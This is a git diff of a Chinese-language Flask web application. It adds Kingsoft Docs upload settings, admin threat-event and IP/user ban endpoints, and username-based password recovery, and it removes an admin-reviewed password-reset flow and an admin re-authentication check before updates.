kdocs_unit_column = data.get("kdocs_unit_column")
kdocs_image_column = data.get("kdocs_image_column")
kdocs_admin_notify_enabled = data.get("kdocs_admin_notify_enabled")
kdocs_admin_notify_email = data.get("kdocs_admin_notify_email")
kdocs_row_start = data.get("kdocs_row_start")
kdocs_row_end = data.get("kdocs_row_end")
if max_concurrent is not None:
if not isinstance(max_concurrent, int) or max_concurrent < 1:
@@ -524,7 +693,13 @@ def update_system_config_api():
if new_max_screenshot_concurrent is not None:
if not isinstance(new_max_screenshot_concurrent, int) or new_max_screenshot_concurrent < 1:
return jsonify({"error": "截图并发数必须大于0建议根据服务器配置设置每个浏览器约占用200MB内存"}), 400
return jsonify({"error": "截图并发数必须大于0建议根据服务器配置设置wkhtmltoimage 资源占用较低"}), 400
if enable_screenshot is not None:
if isinstance(enable_screenshot, bool):
enable_screenshot = 1 if enable_screenshot else 0
if enable_screenshot not in (0, 1):
return jsonify({"error": "截图开关必须是0或1"}), 400
if schedule_time is not None:
import re
@@ -554,6 +729,82 @@ def update_system_config_api():
if not isinstance(auto_approve_vip_days, int) or auto_approve_vip_days < 0:
return jsonify({"error": "注册赠送VIP天数不能为负数"}), 400
if kdocs_enabled is not None:
if isinstance(kdocs_enabled, bool):
kdocs_enabled = 1 if kdocs_enabled else 0
if kdocs_enabled not in (0, 1):
return jsonify({"error": "表格上传开关必须是0或1"}), 400
if kdocs_doc_url is not None:
kdocs_doc_url = str(kdocs_doc_url or "").strip()
if kdocs_doc_url and not is_safe_outbound_url(kdocs_doc_url):
return jsonify({"error": "文档链接格式不正确"}), 400
if kdocs_default_unit is not None:
kdocs_default_unit = str(kdocs_default_unit or "").strip()
if len(kdocs_default_unit) > 50:
return jsonify({"error": "默认县区长度不能超过50"}), 400
if kdocs_sheet_name is not None:
kdocs_sheet_name = str(kdocs_sheet_name or "").strip()
if len(kdocs_sheet_name) > 50:
return jsonify({"error": "Sheet名称长度不能超过50"}), 400
if kdocs_sheet_index is not None:
try:
kdocs_sheet_index = int(kdocs_sheet_index)
except Exception:
return jsonify({"error": "Sheet序号必须是数字"}), 400
if kdocs_sheet_index < 0:
return jsonify({"error": "Sheet序号不能为负数"}), 400
if kdocs_unit_column is not None:
kdocs_unit_column = str(kdocs_unit_column or "").strip().upper()
if not kdocs_unit_column:
return jsonify({"error": "县区列不能为空"}), 400
import re
if not re.match(r"^[A-Z]{1,3}$", kdocs_unit_column):
return jsonify({"error": "县区列格式错误"}), 400
if kdocs_image_column is not None:
kdocs_image_column = str(kdocs_image_column or "").strip().upper()
if not kdocs_image_column:
return jsonify({"error": "图片列不能为空"}), 400
import re
if not re.match(r"^[A-Z]{1,3}$", kdocs_image_column):
return jsonify({"error": "图片列格式错误"}), 400
if kdocs_admin_notify_enabled is not None:
if isinstance(kdocs_admin_notify_enabled, bool):
kdocs_admin_notify_enabled = 1 if kdocs_admin_notify_enabled else 0
if kdocs_admin_notify_enabled not in (0, 1):
return jsonify({"error": "管理员通知开关必须是0或1"}), 400
if kdocs_admin_notify_email is not None:
kdocs_admin_notify_email = str(kdocs_admin_notify_email or "").strip()
if kdocs_admin_notify_email:
is_valid, error_msg = validate_email(kdocs_admin_notify_email)
if not is_valid:
return jsonify({"error": error_msg}), 400
if kdocs_row_start is not None:
try:
kdocs_row_start = int(kdocs_row_start)
except (ValueError, TypeError):
return jsonify({"error": "起始行必须是数字"}), 400
if kdocs_row_start < 0:
return jsonify({"error": "起始行不能为负数"}), 400
if kdocs_row_end is not None:
try:
kdocs_row_end = int(kdocs_row_end)
except (ValueError, TypeError):
return jsonify({"error": "结束行必须是数字"}), 400
if kdocs_row_end < 0:
return jsonify({"error": "结束行不能为负数"}), 400
old_config = database.get_system_config() or {}
if not database.update_system_config(
@@ -564,9 +815,21 @@ def update_system_config_api():
schedule_weekdays=schedule_weekdays,
max_concurrent_per_account=new_max_concurrent_per_account,
max_screenshot_concurrent=new_max_screenshot_concurrent,
enable_screenshot=enable_screenshot,
auto_approve_enabled=auto_approve_enabled,
auto_approve_hourly_limit=auto_approve_hourly_limit,
auto_approve_vip_days=auto_approve_vip_days,
kdocs_enabled=kdocs_enabled,
kdocs_doc_url=kdocs_doc_url,
kdocs_default_unit=kdocs_default_unit,
kdocs_sheet_name=kdocs_sheet_name,
kdocs_sheet_index=kdocs_sheet_index,
kdocs_unit_column=kdocs_unit_column,
kdocs_image_column=kdocs_image_column,
kdocs_admin_notify_enabled=kdocs_admin_notify_enabled,
kdocs_admin_notify_email=kdocs_admin_notify_email,
kdocs_row_start=kdocs_row_start,
kdocs_row_end=kdocs_row_end,
):
return jsonify({"error": "更新失败"}), 400
@@ -577,6 +840,14 @@ def update_system_config_api():
max_global=int(new_config.get("max_concurrent_global", old_config.get("max_concurrent_global", 2))),
max_per_user=int(new_config.get("max_concurrent_per_account", old_config.get("max_concurrent_per_account", 1))),
)
if new_max_screenshot_concurrent is not None:
try:
from browser_pool_worker import resize_browser_worker_pool
if resize_browser_worker_pool(int(new_config.get("max_screenshot_concurrent", new_max_screenshot_concurrent))):
logger.info(f"截图线程池并发已更新为: {new_config.get('max_screenshot_concurrent')}")
except Exception as pool_error:
logger.warning(f"截图线程池并发更新失败: {pool_error}")
except Exception:
pass
@@ -590,6 +861,70 @@ def update_system_config_api():
return jsonify({"message": "系统配置已更新"})
@admin_api_bp.route("/kdocs/status", methods=["GET"])
@admin_required
def get_kdocs_status_api():
"""获取金山文档上传状态"""
try:
from services.kdocs_uploader import get_kdocs_uploader
uploader = get_kdocs_uploader()
status = uploader.get_status()
live = str(request.args.get("live", "")).lower() in ("1", "true", "yes")
if live:
live_status = uploader.refresh_login_status()
if live_status.get("success"):
logged_in = bool(live_status.get("logged_in"))
status["logged_in"] = logged_in
status["last_login_ok"] = logged_in
status["login_required"] = not logged_in
if live_status.get("error"):
status["last_error"] = live_status.get("error")
else:
status["logged_in"] = True if status.get("last_login_ok") else False if status.get("last_login_ok") is False else None
if status.get("last_login_ok") is True and status.get("last_error") == "操作超时":
status["last_error"] = None
return jsonify(status)
except Exception as e:
return jsonify({"error": f"获取状态失败: {e}"}), 500
@admin_api_bp.route("/kdocs/qr", methods=["POST"])
@admin_required
def get_kdocs_qr_api():
"""获取金山文档登录二维码"""
try:
from services.kdocs_uploader import get_kdocs_uploader
uploader = get_kdocs_uploader()
data = request.get_json(silent=True) or {}
force = bool(data.get("force"))
if not force:
force = str(request.args.get("force", "")).lower() in ("1", "true", "yes")
result = uploader.request_qr(force=force)
if not result.get("success"):
return jsonify({"error": result.get("error", "获取二维码失败")}), 400
return jsonify(result)
except Exception as e:
return jsonify({"error": f"获取二维码失败: {e}"}), 500
@admin_api_bp.route("/kdocs/clear-login", methods=["POST"])
@admin_required
def clear_kdocs_login_api():
"""清除金山文档登录态"""
try:
from services.kdocs_uploader import get_kdocs_uploader
uploader = get_kdocs_uploader()
result = uploader.clear_login()
if not result.get("success"):
return jsonify({"error": result.get("error", "清除失败")}), 400
return jsonify({"success": True})
except Exception as e:
return jsonify({"error": f"清除失败: {e}"}), 500
@admin_api_bp.route("/schedule/execute", methods=["POST"])
@admin_required
def execute_schedule_now():
@@ -673,7 +1008,7 @@ def get_server_info_api():
"""获取服务器信息"""
import psutil
cpu_percent = psutil.cpu_percent(interval=1)
cpu_percent = _get_server_cpu_percent()
memory = psutil.virtual_memory()
memory_total = f"{memory.total / (1024**3):.1f}GB"
@@ -776,20 +1111,31 @@ def get_running_tasks_api():
@admin_required
def get_task_logs_api():
"""获取任务日志列表(支持分页和多种筛选)"""
try:
limit = int(request.args.get("limit", 20))
limit = max(1, min(limit, 200)) # 限制 1-200 条
except (ValueError, TypeError):
limit = 20
try:
offset = int(request.args.get("offset", 0))
offset = max(0, offset)
except (ValueError, TypeError):
offset = 0
date_filter = request.args.get("date")
status_filter = request.args.get("status")
source_filter = request.args.get("source")
user_id_filter = request.args.get("user_id")
account_filter = request.args.get("account")
account_filter = (request.args.get("account") or "").strip()
if user_id_filter:
try:
user_id_filter = int(user_id_filter)
except ValueError:
except (ValueError, TypeError):
user_id_filter = None
try:
result = database.get_task_logs(
limit=limit,
offset=offset,
@@ -797,9 +1143,12 @@ def get_task_logs_api():
status_filter=status_filter,
source_filter=source_filter,
user_id_filter=user_id_filter,
account_filter=account_filter,
account_filter=account_filter if account_filter else None,
)
return jsonify(result)
except Exception as e:
logger.error(f"获取任务日志失败: {e}")
return jsonify({"logs": [], "total": 0, "error": "查询失败"})
@admin_api_bp.route("/task/logs/clear", methods=["POST"])
@@ -910,32 +1259,6 @@ def admin_reset_password_route(user_id):
return jsonify({"error": "重置失败,用户不存在"}), 400
@admin_api_bp.route("/password_resets", methods=["GET"])
@admin_required
def get_password_resets_route():
"""获取所有待审核的密码重置申请"""
resets = database.get_pending_password_resets()
return jsonify(resets)
@admin_api_bp.route("/password_resets/<int:request_id>/approve", methods=["POST"])
@admin_required
def approve_password_reset_route(request_id):
"""批准密码重置申请"""
if database.approve_password_reset(request_id):
return jsonify({"message": "密码重置申请已批准"})
return jsonify({"error": "批准失败"}), 400
@admin_api_bp.route("/password_resets/<int:request_id>/reject", methods=["POST"])
@admin_required
def reject_password_reset_route(request_id):
"""拒绝密码重置申请"""
if database.reject_password_reset(request_id):
return jsonify({"message": "密码重置申请已拒绝"})
return jsonify({"error": "拒绝失败"}), 400
@admin_api_bp.route("/feedbacks", methods=["GET"])
@admin_required
def get_all_feedbacks():
@@ -1067,6 +1390,7 @@ def update_email_settings_api():
enabled = data.get("enabled", False)
failover_enabled = data.get("failover_enabled", True)
register_verify_enabled = data.get("register_verify_enabled")
login_alert_enabled = data.get("login_alert_enabled")
base_url = data.get("base_url")
task_notify_enabled = data.get("task_notify_enabled")
@@ -1074,6 +1398,7 @@ def update_email_settings_api():
enabled=enabled,
failover_enabled=failover_enabled,
register_verify_enabled=register_verify_enabled,
login_alert_enabled=login_alert_enabled,
base_url=base_url,
task_notify_enabled=task_notify_enabled,
)

View File

@@ -0,0 +1,348 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from typing import Any
from flask import Blueprint, jsonify, request
import db_pool
from db import security as security_db
from routes.decorators import admin_required
from security import BlacklistManager, RiskScorer
security_bp = Blueprint("admin_security", __name__)
blacklist = BlacklistManager()
scorer = RiskScorer(blacklist_manager=blacklist)
def _truncate(value: Any, max_len: int = 200) -> str:
text = str(value or "")
if max_len <= 0:
return ""
if len(text) <= max_len:
return text
return text[: max(0, max_len - 3)] + "..."
def _parse_int_arg(name: str, default: int, *, min_value: int | None = None, max_value: int | None = None) -> int:
raw = request.args.get(name, None)
if raw is None or str(raw).strip() == "":
value = int(default)
else:
try:
value = int(str(raw).strip())
except Exception:
value = int(default)
if min_value is not None:
value = max(int(min_value), value)
if max_value is not None:
value = min(int(max_value), value)
return value
def _parse_json() -> dict:
if request.is_json:
data = request.get_json(silent=True) or {}
return data if isinstance(data, dict) else {}
# 兼容 form-data
try:
return dict(request.form or {})
except Exception:
return {}
def _parse_bool(value: Any) -> bool:
if isinstance(value, bool):
return value
if isinstance(value, int):
return value != 0
text = str(value or "").strip().lower()
return text in {"1", "true", "yes", "y", "on"}
def _sanitize_threat_event(event: dict) -> dict:
return {
"id": event.get("id"),
"threat_type": event.get("threat_type") or "unknown",
"score": int(event.get("score") or 0),
"ip": _truncate(event.get("ip"), 64),
"user_id": event.get("user_id"),
"request_method": _truncate(event.get("request_method"), 16),
"request_path": _truncate(event.get("request_path"), 256),
"field_name": _truncate(event.get("field_name"), 80),
"rule": _truncate(event.get("rule"), 120),
"matched": _truncate(event.get("matched"), 120),
"value_preview": _truncate(event.get("value_preview"), 200),
"created_at": event.get("created_at"),
}
def _sanitize_ban_entry(entry: dict, *, kind: str) -> dict:
if kind == "ip":
return {
"ip": _truncate(entry.get("ip"), 64),
"reason": _truncate(entry.get("reason"), 200),
"added_at": entry.get("added_at"),
"expires_at": entry.get("expires_at"),
"is_active": int(entry.get("is_active") or 0),
}
if kind == "user":
return {
"user_id": entry.get("user_id"),
"reason": _truncate(entry.get("reason"), 200),
"added_at": entry.get("added_at"),
"expires_at": entry.get("expires_at"),
"is_active": int(entry.get("is_active") or 0),
}
return {}
@security_bp.route("/api/admin/security/dashboard", methods=["GET"])
@admin_required
def get_security_dashboard():
"""
获取安全仪表板数据
返回:
- 最近24小时威胁事件数
- 当前封禁IP数
- 当前封禁用户数
- 最近10条威胁事件
"""
try:
threat_24h = security_db.get_threat_events_count(hours=24)
except Exception:
threat_24h = 0
try:
banned_ips = blacklist.get_banned_ips()
except Exception:
banned_ips = []
try:
banned_users = blacklist.get_banned_users()
except Exception:
banned_users = []
try:
recent = security_db.get_threat_events_list(page=1, per_page=10, filters={}).get("items", [])
recent_items = [_sanitize_threat_event(e) for e in recent if isinstance(e, dict)]
except Exception:
recent_items = []
return jsonify(
{
"threat_events_24h": int(threat_24h or 0),
"banned_ip_count": len(banned_ips),
"banned_user_count": len(banned_users),
"recent_threat_events": recent_items,
}
)
@security_bp.route("/api/admin/security/threats", methods=["GET"])
@admin_required
def get_threat_events():
"""
获取威胁事件列表(分页)
参数: page, per_page, severity, event_type
"""
page = _parse_int_arg("page", 1, min_value=1, max_value=100000)
per_page = _parse_int_arg("per_page", 20, min_value=1, max_value=200)
severity = (request.args.get("severity") or "").strip()
event_type = (request.args.get("event_type") or "").strip()
filters: dict[str, Any] = {}
if severity:
filters["severity"] = severity
if event_type:
filters["event_type"] = event_type
data = security_db.get_threat_events_list(page, per_page, filters)
items = data.get("items") or []
data["items"] = [_sanitize_threat_event(e) for e in items if isinstance(e, dict)]
return jsonify(data)
@security_bp.route("/api/admin/security/banned-ips", methods=["GET"])
@admin_required
def get_banned_ips():
"""获取封禁IP列表"""
items = blacklist.get_banned_ips()
return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="ip") for x in items]})
@security_bp.route("/api/admin/security/banned-users", methods=["GET"])
@admin_required
def get_banned_users():
"""获取封禁用户列表"""
items = blacklist.get_banned_users()
return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="user") for x in items]})
@security_bp.route("/api/admin/security/ban-ip", methods=["POST"])
@admin_required
def ban_ip():
"""
手动封禁IP
参数: ip, reason, duration_hours(可选), permanent(可选)
"""
data = _parse_json()
ip = str(data.get("ip") or "").strip()
reason = str(data.get("reason") or "").strip()
duration_hours_raw = data.get("duration_hours", 24)
permanent = _parse_bool(data.get("permanent", False))
if not ip:
return jsonify({"error": "ip不能为空"}), 400
if not reason:
return jsonify({"error": "reason不能为空"}), 400
try:
duration_hours = max(1, int(duration_hours_raw))
except Exception:
duration_hours = 24
ok = blacklist.ban_ip(ip, reason, duration_hours=duration_hours, permanent=permanent)
if not ok:
return jsonify({"error": "封禁失败"}), 400
return jsonify({"success": True})
@security_bp.route("/api/admin/security/unban-ip", methods=["POST"])
@admin_required
def unban_ip():
"""解除IP封禁"""
data = _parse_json()
ip = str(data.get("ip") or "").strip()
if not ip:
return jsonify({"error": "ip不能为空"}), 400
ok = blacklist.unban_ip(ip)
if not ok:
return jsonify({"error": "未找到封禁记录"}), 404
return jsonify({"success": True})
@security_bp.route("/api/admin/security/ban-user", methods=["POST"])
@admin_required
def ban_user():
"""手动封禁用户"""
data = _parse_json()
user_id_raw = data.get("user_id")
reason = str(data.get("reason") or "").strip()
duration_hours_raw = data.get("duration_hours", 24)
permanent = _parse_bool(data.get("permanent", False))
try:
user_id = int(user_id_raw)
except Exception:
user_id = None
if user_id is None:
return jsonify({"error": "user_id不能为空"}), 400
if not reason:
return jsonify({"error": "reason不能为空"}), 400
try:
duration_hours = max(1, int(duration_hours_raw))
except Exception:
duration_hours = 24
ok = blacklist._ban_user_internal(user_id, reason=reason, duration_hours=duration_hours, permanent=permanent)
if not ok:
return jsonify({"error": "封禁失败"}), 400
return jsonify({"success": True})
@security_bp.route("/api/admin/security/unban-user", methods=["POST"])
@admin_required
def unban_user():
"""解除用户封禁"""
data = _parse_json()
user_id_raw = data.get("user_id")
try:
user_id = int(user_id_raw)
except Exception:
user_id = None
if user_id is None:
return jsonify({"error": "user_id不能为空"}), 400
ok = blacklist.unban_user(user_id)
if not ok:
return jsonify({"error": "未找到封禁记录"}), 404
return jsonify({"success": True})
@security_bp.route("/api/admin/security/ip-risk/<ip>", methods=["GET"])
@admin_required
def get_ip_risk(ip):
"""获取指定IP的风险评分和历史事件"""
ip_text = str(ip or "").strip()
if not ip_text:
return jsonify({"error": "ip不能为空"}), 400
history = security_db.get_ip_threat_history(ip_text)
return jsonify(
{
"ip": _truncate(ip_text, 64),
"risk_score": int(scorer.get_ip_score(ip_text) or 0),
"is_banned": bool(blacklist.is_ip_banned(ip_text)),
"threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)],
}
)
@security_bp.route("/api/admin/security/ip-risk/clear", methods=["POST"])
@admin_required
def clear_ip_risk():
"""清除指定IP的风险分"""
data = _parse_json()
ip_text = str(data.get("ip") or "").strip()
if not ip_text:
return jsonify({"error": "ip不能为空"}), 400
if not scorer.reset_ip_score(ip_text):
return jsonify({"error": "清理失败"}), 400
return jsonify({"success": True, "ip": _truncate(ip_text, 64), "risk_score": 0})
@security_bp.route("/api/admin/security/user-risk/<int:user_id>", methods=["GET"])
@admin_required
def get_user_risk(user_id):
"""获取指定用户的风险评分和历史事件"""
history = security_db.get_user_threat_history(user_id)
return jsonify(
{
"user_id": int(user_id),
"risk_score": int(scorer.get_user_score(user_id) or 0),
"is_banned": bool(blacklist.is_user_banned(user_id)),
"threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)],
}
)
@security_bp.route("/api/admin/security/cleanup", methods=["POST"])
@admin_required
def cleanup_expired():
"""清理过期的封禁记录和衰减风险分"""
try:
blacklist.cleanup_expired()
except Exception:
pass
try:
scorer.decay_scores()
except Exception:
pass
# 可选:返回当前连接池统计信息,便于排查后台运行状态
pool_stats = None
try:
pool_stats = db_pool.get_pool_stats()
except Exception:
pool_stats = None
return jsonify({"success": True, "pool_stats": pool_stats})

View File

@@ -3,7 +3,6 @@
from __future__ import annotations
import os
import time
import uuid
from flask import jsonify, request, session
@@ -66,13 +65,6 @@ def _parse_bool_field(data: dict, key: str) -> bool | None:
raise ValueError(f"{key} 必须是 0/1 或 true/false")
def _admin_reauth_required() -> bool:
try:
return time.time() > float(session.get("admin_reauth_until", 0) or 0)
except Exception:
return True
@admin_api_bp.route("/update/status", methods=["GET"])
@admin_required
def get_update_status_api():
@@ -154,8 +146,6 @@ def request_update_check_api():
def request_update_run_api():
"""请求宿主机 Update-Agent 执行一键更新并重启服务。"""
ensure_update_dirs()
if _admin_reauth_required():
return jsonify({"error": "需要二次确认", "code": "reauth_required"}), 401
if _has_pending_request():
return jsonify({"error": "已有更新请求正在处理中,请稍后再试"}), 409

View File

@@ -11,7 +11,6 @@ from crypto_utils import encrypt_password as encrypt_account_password
from flask import Blueprint, jsonify, request
from flask_login import current_user, login_required
from services.accounts_service import load_user_accounts
from services.browser_manager import init_browser_manager_async
from services.browse_types import BROWSE_TYPE_SHOULD_READ, normalize_browse_type, validate_browse_type
from services.client_log import log_to_client
from services.models import Account
@@ -230,10 +229,6 @@ def start_account(account_id):
if not browse_type:
return jsonify({"error": "浏览类型无效"}), 400
enable_screenshot = data.get("enable_screenshot", True)
if enable_screenshot:
# 异步初始化浏览器环境,避免首次下载/安装 Chromium 阻塞请求导致“网页无响应”
init_browser_manager_async()
ok, message = submit_account_task(
user_id=user_id,
account_id=account_id,
@@ -308,9 +303,6 @@ def manual_screenshot(account_id):
account.last_browse_type = browse_type
# 异步初始化浏览器环境,避免首次下载/安装 Chromium 阻塞请求
init_browser_manager_async()
threading.Thread(
target=take_screenshot_for_account,
args=(user_id, account_id, browse_type, "manual_screenshot"),
@@ -336,10 +328,6 @@ def batch_start_accounts():
if not account_ids:
return jsonify({"error": "请选择要启动的账号"}), 400
if enable_screenshot:
# 异步初始化浏览器环境,避免首次下载/安装 Chromium 阻塞请求
init_browser_manager_async()
started = []
failed = []

View File

@@ -237,12 +237,19 @@ def forgot_password():
"""发送密码重置邮件"""
data = request.json or {}
email = data.get("email", "").strip().lower()
username = data.get("username", "").strip()
captcha_session = data.get("captcha_session", "")
captcha_code = data.get("captcha", "").strip()
if not email:
return jsonify({"error": "请输入邮箱"}), 400
if not email and not username:
return jsonify({"error": "请输入邮箱或用户名"}), 400
if username:
is_valid, error_msg = validate_username(username)
if not is_valid:
return jsonify({"error": error_msg}), 400
if email:
is_valid, error_msg = validate_email(email)
if not is_valid:
return jsonify({"error": error_msg}), 400
@@ -251,6 +258,7 @@ def forgot_password():
allowed, error_msg = check_ip_request_rate(client_ip, "email")
if not allowed:
return jsonify({"error": error_msg}), 429
if email:
allowed, error_msg = check_email_rate_limit(email, "forgot_password")
if not allowed:
return jsonify({"error": error_msg}), 429
@@ -266,6 +274,34 @@ def forgot_password():
if not email_settings.get("enabled", False):
return jsonify({"error": "邮件功能未启用,请联系管理员"}), 400
if username:
user = database.get_user_by_username(username)
if user and user.get("status") == "approved":
bound_email = (user.get("email") or "").strip()
if not bound_email:
return (
jsonify(
{
"error": "您尚未绑定邮箱,无法通过邮箱找回密码。请联系管理员重置密码。",
"code": "email_not_bound",
}
),
400,
)
allowed, error_msg = check_email_rate_limit(bound_email, "forgot_password")
if not allowed:
return jsonify({"error": error_msg}), 429
result = email_service.send_password_reset_email(
email=bound_email,
username=user["username"],
user_id=user["id"],
)
if not result["success"]:
logger.error(f"密码重置邮件发送失败: {result['error']}")
return jsonify({"success": True, "message": "如果该账号已绑定邮箱,您将收到密码重置邮件"})
user = database.get_user_by_email(email)
if user and user.get("status") == "approved":
result = email_service.send_password_reset_email(email=email, username=user["username"], user_id=user["id"])
@@ -317,46 +353,6 @@ def reset_password_confirm():
return jsonify({"error": "密码重置失败"}), 500
@api_auth_bp.route("/api/reset_password_request", methods=["POST"])
def request_password_reset():
"""用户申请重置密码(需要审核)"""
data = request.json or {}
username = data.get("username", "").strip()
email = data.get("email", "").strip().lower()
new_password = data.get("new_password", "").strip()
if not username or not new_password:
return jsonify({"error": "用户名和新密码不能为空"}), 400
is_valid, error_msg = validate_password(new_password)
if not is_valid:
return jsonify({"error": error_msg}), 400
if email:
is_valid, error_msg = validate_email(email)
if not is_valid:
return jsonify({"error": error_msg}), 400
client_ip = get_rate_limit_ip()
allowed, error_msg = check_ip_request_rate(client_ip, "email")
if not allowed:
return jsonify({"error": error_msg}), 429
if email:
allowed, error_msg = check_email_rate_limit(email, "reset_request")
if not allowed:
return jsonify({"error": error_msg}), 429
user = database.get_user_by_username(username)
if user:
if email and user.get("email") != email:
pass
else:
database.create_password_reset_request(user["id"], new_password)
return jsonify({"message": "如果账号存在,密码重置申请已提交,请等待管理员审核"})
@api_auth_bp.route("/api/generate_captcha", methods=["POST"])
def generate_captcha():
"""生成4位数字验证码图片"""
@@ -484,7 +480,11 @@ def login():
user_agent = request.headers.get("User-Agent", "")
context = database.record_login_context(user["id"], client_ip, user_agent)
if context and (context.get("new_ip") or context.get("new_device")):
if config.LOGIN_ALERT_ENABLED and should_send_login_alert(user["id"], client_ip):
if (
config.LOGIN_ALERT_ENABLED
and should_send_login_alert(user["id"], client_ip)
and email_service.get_email_settings().get("login_alert_enabled", True)
):
user_info = database.get_user_by_id(user["id"]) or {}
if user_info.get("email") and user_info.get("email_verified"):
if database.get_user_email_notify(user["id"]):

View File

@@ -35,6 +35,7 @@ def get_active_announcement():
"id": announcement.get("id"),
"title": announcement.get("title", ""),
"content": announcement.get("content", ""),
"image_url": announcement.get("image_url") or "",
"created_at": announcement.get("created_at"),
}
}
@@ -147,6 +148,50 @@ def get_user_email():
return jsonify({"email": user.get("email", ""), "email_verified": user.get("email_verified", False)})
@api_user_bp.route("/api/user/kdocs", methods=["GET"])
@login_required
def get_user_kdocs_settings():
"""获取当前用户的金山文档设置"""
settings = database.get_user_kdocs_settings(current_user.id)
if not settings:
return jsonify({"kdocs_unit": "", "kdocs_auto_upload": 0})
return jsonify(settings)
@api_user_bp.route("/api/user/kdocs", methods=["POST"])
@login_required
def update_user_kdocs_settings():
"""更新当前用户的金山文档设置"""
data = request.get_json() or {}
kdocs_unit = data.get("kdocs_unit")
kdocs_auto_upload = data.get("kdocs_auto_upload")
if kdocs_unit is not None:
kdocs_unit = str(kdocs_unit or "").strip()
if len(kdocs_unit) > 50:
return jsonify({"error": "县区长度不能超过50"}), 400
if kdocs_auto_upload is not None:
if isinstance(kdocs_auto_upload, bool):
kdocs_auto_upload = 1 if kdocs_auto_upload else 0
try:
kdocs_auto_upload = int(kdocs_auto_upload)
except Exception:
return jsonify({"error": "自动上传开关必须是0或1"}), 400
if kdocs_auto_upload not in (0, 1):
return jsonify({"error": "自动上传开关必须是0或1"}), 400
if not database.update_user_kdocs_settings(
current_user.id,
kdocs_unit=kdocs_unit,
kdocs_auto_upload=kdocs_auto_upload,
):
return jsonify({"error": "更新失败"}), 400
settings = database.get_user_kdocs_settings(current_user.id) or {"kdocs_unit": "", "kdocs_auto_upload": 0}
return jsonify({"success": True, "settings": settings})
@api_user_bp.route("/api/user/bind-email", methods=["POST"])
@login_required
@require_ip_not_locked
@@ -303,3 +348,37 @@ def get_run_stats():
"today_attachments": stats.get("total_attachments", 0),
}
)
@api_user_bp.route("/api/kdocs/status", methods=["GET"])
@login_required
def get_kdocs_status_for_user():
"""获取金山文档在线状态(用户端简化版)"""
try:
# 检查系统是否启用了金山文档功能
cfg = database.get_system_config() or {}
kdocs_enabled = int(cfg.get("kdocs_enabled") or 0)
if not kdocs_enabled:
return jsonify({"enabled": False, "online": False, "message": "未启用"})
# 获取金山文档状态
from services.kdocs_uploader import get_kdocs_uploader
kdocs = get_kdocs_uploader()
status = kdocs.get_status()
login_required_flag = status.get("login_required", False)
last_login_ok = status.get("last_login_ok")
# 判断是否在线
is_online = not login_required_flag and last_login_ok is True
return jsonify({
"enabled": True,
"online": is_online,
"message": "就绪" if is_online else "离线"
})
except Exception as e:
logger.error(f"获取金山文档状态失败: {e}")
return jsonify({"enabled": False, "online": False, "message": "获取失败"})

View File

@@ -14,11 +14,20 @@ def admin_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
try:
logger = get_logger()
except Exception:
import logging
logger = logging.getLogger("app")
logger.debug(f"[admin_required] 检查会话admin_id存在: {'admin_id' in session}")
if "admin_id" not in session:
logger.warning(f"[admin_required] 拒绝访问 {request.path} - session中无admin_id")
is_api = request.blueprint == "admin_api" or request.path.startswith("/yuyx/api")
is_api = (
request.blueprint in {"admin_api", "admin_security", "admin_security_yuyx"}
or request.path.startswith("/yuyx/api")
or request.path.startswith("/api/admin")
)
if is_api:
return jsonify({"error": "需要管理员权限"}), 403
return redirect(url_for("pages.admin_login_page"))

View File

@@ -6,7 +6,7 @@ import json
import os
from typing import Optional
from flask import Blueprint, current_app, redirect, render_template, session, url_for
from flask import Blueprint, current_app, redirect, render_template, request, session, url_for
from flask_login import current_user, login_required
from routes.decorators import admin_required
@@ -36,10 +36,18 @@ def render_app_spa_or_legacy(
logger.warning(f"[app_spa] manifest缺少入口文件: {manifest_path}")
return render_template(legacy_template_name, **legacy_context)
app_spa_js_file = f"app/{js_file}"
app_spa_css_files = [f"app/{p}" for p in css_files]
app_spa_build_id = _get_asset_build_id(
os.path.join(current_app.root_path, "static"),
[app_spa_js_file, *app_spa_css_files],
)
return render_template(
"app.html",
app_spa_js_file=f"app/{js_file}",
app_spa_css_files=[f"app/{p}" for p in css_files],
app_spa_js_file=app_spa_js_file,
app_spa_css_files=app_spa_css_files,
app_spa_build_id=app_spa_build_id,
app_spa_initial_state=spa_initial_state,
)
except FileNotFoundError:
@@ -50,6 +58,27 @@ def render_app_spa_or_legacy(
return render_template(legacy_template_name, **legacy_context)
def _get_asset_build_id(static_root: str, rel_paths: list[str]) -> Optional[str]:
mtimes = []
for rel_path in rel_paths:
if not rel_path:
continue
try:
mtimes.append(os.path.getmtime(os.path.join(static_root, rel_path)))
except OSError:
continue
if not mtimes:
return None
return str(int(max(mtimes)))
def _is_legacy_admin_user_agent(user_agent: str) -> bool:
if not user_agent:
return False
ua = user_agent.lower()
return "msie" in ua or "trident/" in ua
@pages_bp.route("/")
def index():
"""主页 - 重定向到登录或应用"""
@@ -96,6 +125,8 @@ def admin_login_page():
@admin_required
def admin_page():
"""后台管理页面"""
if request.args.get("legacy") == "1" or _is_legacy_admin_user_agent(request.headers.get("User-Agent", "")):
return render_template("admin_legacy.html")
logger = get_logger()
manifest_path = os.path.join(current_app.root_path, "static", "admin", ".vite", "manifest.json")
try:
@@ -110,10 +141,18 @@ def admin_page():
logger.warning(f"[admin_spa] manifest缺少入口文件: {manifest_path}")
return render_template("admin_legacy.html")
admin_spa_js_file = f"admin/{js_file}"
admin_spa_css_files = [f"admin/{p}" for p in css_files]
admin_spa_build_id = _get_asset_build_id(
os.path.join(current_app.root_path, "static"),
[admin_spa_js_file, *admin_spa_css_files],
)
return render_template(
"admin.html",
admin_spa_js_file=f"admin/{js_file}",
admin_spa_css_files=[f"admin/{p}" for p in css_files],
admin_spa_js_file=admin_spa_js_file,
admin_spa_css_files=admin_spa_css_files,
admin_spa_build_id=admin_spa_build_id,
)
except FileNotFoundError:
logger.warning(f"[admin_spa] 未找到manifest: {manifest_path},回退旧版后台模板")

22
security/__init__.py Normal file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from security.blacklist import BlacklistManager
from security.honeypot import HoneypotResponder
from security.middleware import init_security_middleware
from security.response_handler import ResponseAction, ResponseHandler, ResponseStrategy
from security.risk_scorer import RiskScorer
from security.threat_detector import ThreatDetector, ThreatResult
__all__ = [
